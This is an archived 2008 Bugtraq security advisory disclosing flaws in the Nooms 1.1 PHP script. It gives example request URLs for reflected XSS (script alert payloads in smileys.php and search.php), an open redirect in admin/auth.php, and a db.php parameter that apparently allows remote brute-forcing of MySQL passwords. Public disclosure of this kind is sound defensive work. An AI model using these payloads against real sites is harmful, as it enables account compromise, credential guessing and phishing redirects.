Nooms 1.1

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Nooms 1.1
From: irancrash@xxxxxxxxx
Date: Thu, 11 Sep 2008 06:24:24 -0600
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

----------------------------------------------------------------

Script : Nooms 1.1

Type : Multiple Vulnerabilities (Cross Site Scripting/Redirect/Mysql Brute 
Force Local Access)

Risk : Medium

----------------------------------------------------------------

Download From : 
http://surfnet.dl.sourceforge.net/sourceforge/nooms/nooms_1.1.zip

----------------------------------------------------------------

Discovered by : Khashayar Fereidani Or Dr.Crash

My Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Mysql Remote Brute Force Vulnerability :


This is new type of the vulnerabilities .

I can't public Exploit of this vulnerability ,
But with this vulnerability attacker can brute force root and other user 
password with php in remote mode .

Mysql Brute Force Vulnerability : 
/db.php?g_dbhost=localhost&g_dbuser=[username]&g_dbpwd=[password]

----------------------------------------------------------------

Cross Site Scripting Vulnerabilities :

Xss 1 : http://Example/smileys.php?page_id=<script>alert('xss')</script>

Xss 2 : http://Example/search.php?q=";<script>alert('xss')</script>

----------------------------------------------------------------

Redirect Vulnerability :

Xss 1 : http://Example/admin/auth.php?g_site_url=[URL]

----------------------------------------------------------------

                        Tnx : God

          HTTP://IRCRASH.COM HTTP://FEREIDANI.IR

----------------------------------------------------------------

Prev by Date: [security bulletin] HPSBOV02364 SSRT080078 rev.1 - HP OpenVMS SMGRTL Run Time Library, Local Authorized User, Gain Privileged Access
Next by Date: Advisory 04/2008: Joomla Weak Random Password Reset Token Vulnerability
Previous by thread: [security bulletin] HPSBOV02364 SSRT080078 rev.1 - HP OpenVMS SMGRTL Run Time Library, Local Authorized User, Gain Privileged Access
Next by thread: Advisory 04/2008: Joomla Weak Random Password Reset Token Vulnerability
Index(es):
- Date
- Thread